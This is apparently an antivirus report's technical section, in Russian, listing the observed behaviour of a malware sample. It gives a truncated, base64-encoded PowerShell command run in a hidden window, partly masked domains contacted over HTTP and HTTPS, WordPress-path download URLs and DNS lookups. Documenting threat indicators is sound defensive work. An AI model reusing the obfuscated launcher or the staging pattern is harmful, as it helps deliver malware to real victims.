Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABGAHgAawB6AHoAYwBhAD0AKAAnAFgAMQAnACsAJwBpACcAKwAoACcAdQAnACsAJwAxADQAawAnACkAKQA7AC4AKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBTAGUAcgBwAFIATw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1512
- %TEMP%\1110649.cvr
- 'bl##.#unapro.com':80
- 'bl##.#unapro.com':443
- 'as###oup.org':80
- 'be##hr.com':443
- 'ma###ien.net':443
- http://bl##.#unapro.com/wp-admin/i/
- http://as###oup.org/wp-snapshots/Ap/
- 'bl##.#unapro.com':443
- 'be##hr.com':443
- 'ma###ien.net':443
- DNS ASK bl##.#unapro.com
- DNS ASK br####rumley.com
- DNS ASK el#####nicsvibes.com
- DNS ASK as###oup.org
- DNS ASK be##hr.com
- DNS ASK ma###ien.net
- DNS ASK pa####itkpark.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABGAHgAawB6AHoAYwBhAD0AKAAnAFgAMQAnACsAJwBpACcAKwAoACcAdQAnACsAJwAxADQAawAnACkAKQA7AC4AKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBTAGUAcgBwAFIATw...' (со скрытым окном)